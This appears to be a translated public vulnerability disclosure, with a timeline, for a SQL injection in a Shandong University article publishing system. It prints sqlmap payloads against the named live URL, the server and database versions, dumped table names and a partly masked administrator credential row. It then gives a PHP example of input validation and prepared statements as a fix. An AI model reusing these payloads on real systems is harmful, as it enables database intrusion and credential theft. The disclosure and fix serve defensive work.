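2015-11-10: Details reported to the vendor; awaiting vendor handling
2015-11-17: Vendor confirmed; details disclosed to the vendor only
2015-11-27: Details disclosed to core white hats and experts in related fields
2015-12-07: Details disclosed to regular white hats
2015-12-17: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public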
An injection vulnerability at Shandong University compromises the article publishing system
http://tjsl.sdu.edu.cn/TestCenter/SubPage/list.php?ClassID=1 and 1=1&pagenow=2 is vulnerable to SQL injection
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: http://tjsl.sdu.edu.cn:80/TestCenter/SubPage/list.php?ClassID=1 and 1=-3324 OR 5387=5387#&pagenow=2
    Vector: OR [INFERENCE]#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://tjsl.sdu.edu.cn:80/TestCenter/SubPage/list.php?ClassID=1 and 1=1 AND (SELECT 5525 FROM(SELECT COUNT(*),CONCAT(0x7170787671,(SELECT (ELT(5525=5525,1))),0x7171767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&pagenow=2
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
web application technology: PHP 5.2.13, Apache 2.2.15
back-end DBMS: MySQL 5.0
Table names obtained:
Database: tjsl
[37 tables]
+-----------------------+
| pe_article_鏉堟挸鍤柨娆抃\?af\\?af |
| pe_actions            |
| pe_admin              |
| pe_adzone             |
| pe_announce           |
| pe_article            |
| pe_channel            |
| pe_city               |
| pe_class              |
| pe_comment            |
| pe_config             |
| pe_consumelog         |
| pe_contacter          |
| pe_country            |
| pe_delivertype        |
| pe_dictionary         |
| pe_friendsite         |
| pe_histrolynews       |
| pe_houseconfig        |
| pe_infos              |
| pe_item               |
| pe_jsfile             |
| pe_label              |
| pe_log                |
| pe_mailchannel        |
| pe_menu               |
| pe_newkeys            |
| pe_payplatform        |
| pe_province           |
| pe_skin               |
| pe_template           |
| pe_templateproject    |
| pe_user               |
| pe_usergroup          |
| pe_users              |
| pe_usertype           |
| pe_works              |
+-----------------------+
20 administrator account passwords for the article publishing system; one is listed here as proof:
[11 entries]
+----+---------------+-----------------+----------+
| id | username      | password        | usertype |
+----+---------------+-----------------+----------+
| 1  | administrator | ce****46        | 2        |
+----+---------------+-----------------+----------+
Injection leading into the content management system's admin backend:
Parameter filtering
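
One way to apply parameter filtering to the ClassID and pagenow parameters, as an added example that is not part of the original report or the site's own code. The column names, page size and function names are assumptions; it targets PHP 7.1+ with PDO, and the demo data is constructed in an in-memory SQLite database.

```php
<?php
// Added example: strict integer validation plus bound parameters.
// Columns, page size and function names are assumed, not taken from list.php.
const PAGE_SIZE = 20; // assumed page size

// Accept only a plain positive decimal integer; anything else yields null.
function parse_positive_int($raw): ?int
{
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 9) {
        return null;
    }
    $n = (int)$raw;
    return $n >= 1 ? $n : null;
}

// Query with typed, bound parameters so request input never becomes SQL text.
function list_articles(PDO $pdo, $classId, $pageNow): ?array
{
    $cid = parse_positive_int($classId);
    $page = parse_positive_int($pageNow);
    if ($cid === null || $page === null) {
        return null; // caller should answer with a 400 response
    }
    $stmt = $pdo->prepare(
        'SELECT id, title FROM pe_article WHERE class_id = :cid
         ORDER BY id DESC LIMIT :lim OFFSET :off'
    );
    $stmt->bindValue(':cid', $cid, PDO::PARAM_INT);
    $stmt->bindValue(':lim', PAGE_SIZE, PDO::PARAM_INT);
    $stmt->bindValue(':off', ($page - 1) * PAGE_SIZE, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo data (hypothetical schema) so the script runs offline.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE pe_article (id INTEGER PRIMARY KEY, class_id INTEGER, title TEXT)');
$pdo->exec("INSERT INTO pe_article (class_id, title) VALUES (1, 'a'), (2, 'b')");

var_dump(list_articles($pdo, '1', '1'));          // well-formed request
var_dump(list_articles($pdo, '1 and 1=1', '2'));  // the probe from the report is rejected
```

Keeping `PDO::ERRMODE_EXCEPTION` while showing clients only a generic error page also stops database error text from reaching the response, which is what the error-based technique in the scan output depends on.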
Severity: Low
Vulnerability Rank: 4
Confirmed: 2015-11-17 16:16
The organization that owns the system has been notified to handle it
None yet